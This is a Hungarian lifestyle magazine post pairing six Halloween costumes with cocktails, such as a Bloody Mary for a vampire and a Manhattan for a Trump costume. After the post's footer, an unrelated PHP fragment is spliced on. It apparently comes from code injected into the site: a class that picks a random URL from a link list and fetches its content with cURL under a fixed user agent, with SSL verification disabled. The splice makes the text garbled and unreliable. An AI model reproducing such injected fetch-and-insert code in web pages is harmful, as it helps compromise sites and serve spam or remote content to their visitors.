6 jelmez-ital párosítás Halloween alkalmából

A Halloween nálunk is egyre népszerűbb ünnep, hazánkban is kezdenek elterjedni az olyan angolszász szokások, mint a tökfaragás és a jelmezes bulik – már nem csak a farsang ad alkalmat arra, hogy néhány órán át szórakoztató ruhákat viseljünk. De ahhoz, hogy igazán stílusosak legyünk, nem árt, ha karakterünkhöz az italunk is passzol. Szöcskéből bájital Boszorkányjelmez... View Article


A Halloween nálunk is egyre népszerűbb ünnep, hazánkban is kezdenek elterjedni az olyan angolszász szokások, mint a tökfaragás és a jelmezes bulik – már nem csak a farsang ad alkalmat arra, hogy néhány órán át szórakoztató ruhákat viseljünk. De ahhoz, hogy igazán stílusosak legyünk, nem árt, ha karakterünkhöz az italunk is passzol.

Szöcskéből bájital

Boszorkányjelmez mellé a Grashopper a tökéletes választás, hiszen mindannyian tudjuk, hogy a bájitalok éjfélkor készülnek és mindenféle tücsköt-bogarat tartalmaznak. Persze ez a krémes, csokoládés-mentás ital jóval ártalmatlanabb, mint a boszorkányok, de azért nem árt, ha csínján bánunk vele.

Elza bora jégből terem

A szépséges Disney-hercegnő nem csak a gyerekek körében népszerű, felnőttek is szívesen öltenek magukra pompás kosztümöt. Amihez Elza hozzáér az jégbe fagy, így mi mást is ihatna a gyönyörű szőkeség, mint jégbort? Ezt a kombinációt nem csak hideg szépségeknek ajánljuk!

Flashy Flapper? Egy gin martini extra dirty rendel!

Klasszikus és kifinomult, mégis szuperpompás – ilyenek voltak az 1920-as évek, vagy legalábbis így emlékezünk rájuk. Jazz, csillogás, szipka, vörös rúzs… a lokálok igazi dívájának kellékei. A gin martini tökéletes kiegészítő ehhez a figyelemfelkeltő megjelenéshez.

A diszkóklubban szól már a zene

Egy diszkó dívának életeleme a tánc, egészen biztos, hogy nem hagyja abba hajnalig, s amikor már a nap is felkel, mi más lehetne a tökéletes ital, mint a tequila sunrise?

Vámpírok véres itala

A boszorkányjelmez mellett a vámpír a másik elunhatatlan örökzöld, amely minden halloween parti elengedhetetlen szereplője. S mint tudjuk, ezek a sápadt szerzetek nagyon-nagyon kedvelik a vért. Éppen ezért az a legkézenfekvőbb, ha Bloody Maryvel kínáljuk őket.

Manhattan Donald Trump kezében

Ha már az ünneplés módja amerikai, miért is ne jelenhetnénk meg egy népszerű amerikai jelmezben – Donald Trumpként? Trump kezébe pedig egy igazi amerikai koktél dukál – a Manhattan.

Forrás: vinepair.com

(Visited 1 times, 1 visits today)

The post 6 jelmez-ital párosítás Halloween alkalmából appeared first on VinCE Magazin.


html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>